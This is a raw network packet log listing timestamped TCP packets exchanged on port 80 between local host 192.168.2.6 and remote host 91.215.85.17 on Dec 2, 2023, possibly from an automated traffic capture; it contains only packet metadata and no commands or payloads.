                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485426903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485451937 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485464096 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485476017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485476971 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485487938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485500097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485507965 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485537052 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485613108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485655069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485667944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485688925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485707045 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485737085 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485738993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485760927 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485804081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485825062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485836983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485857964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485872984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485888958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485918999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485933065 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485939980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485968113 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.485991955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486004114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486020088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486032009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486061096 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486089945 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486090899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486108065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486119986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486140013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486149073 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486183882 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486289024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486301899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486339092 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486354113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486365080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486399889 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486402035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486414909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486459970 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486474991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486488104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486526966 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486557007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486571074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486581087 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486593962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486608028 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486624956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486680031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486691952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486737967 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486759901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486772060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486783981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486803055 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486835957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486848116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486860991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486871958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486881018 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486907005 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486922026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486947060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486958027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486985922 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.486989975 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487001896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487040043 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487046003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487059116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487098932 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487119913 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487133026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487168074 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487199068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487210989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487221003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487231970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487241030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487243891 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487257004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487263918 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487303019 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487348080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487350941 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487371922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487425089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487436056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487463951 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487509012 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487581968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487642050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487653017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487663984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487690926 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487718105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487751961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487782955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487812996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487812996 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487824917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487864971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487868071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487906933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487937927 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487950087 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487972975 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.487998009 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488061905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488169909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488181114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488192081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488209963 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488226891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488234997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488279104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488292933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488305092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488321066 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488339901 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488379002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488421917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488468885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488480091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488507032 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488514900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488531113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488535881 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488540888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488563061 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488564968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488579035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488590956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488620043 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488639116 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488641024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488691092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488749981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488780975 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488794088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488806009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488830090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488840103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488842010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488862038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488913059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488928080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488939047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488949060 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488949060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488970041 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488976955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.488990068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489001036 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489022970 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489032030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489042997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489049911 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489077091 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489099026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489110947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489155054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489159107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489175081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489214897 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489226103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489248037 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489275932 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489335060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489346981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489356995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489367008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489378929 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489402056 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489543915 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489557981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489573002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489600897 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489648104 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489696980 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489784956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489795923 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489806890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489820004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489830017 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489830971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489841938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489851952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489854097 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489862919 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489873886 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489873886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489885092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489888906 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489897013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489907980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489913940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489921093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489942074 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489955902 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.489963055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490030050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490066051 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490098000 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490108967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490123034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490134001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490144014 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490145922 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490156889 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490163088 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490187883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490192890 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490295887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490309000 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490320921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490345001 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490365028 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490366936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490468979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490482092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490494967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490504026 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490506887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490526915 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490752935 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.490808964 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.627923965 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.627923965 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.853530884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.871124983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.878444910 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.878475904 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.104441881 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.121474028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.121495008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.121506929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.121519089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.121551991 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.121568918 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.121938944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.121953964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122003078 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122015953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122092962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122107029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122118950 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122131109 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.122132063 CET4972080192.168.2.691.215.85.17
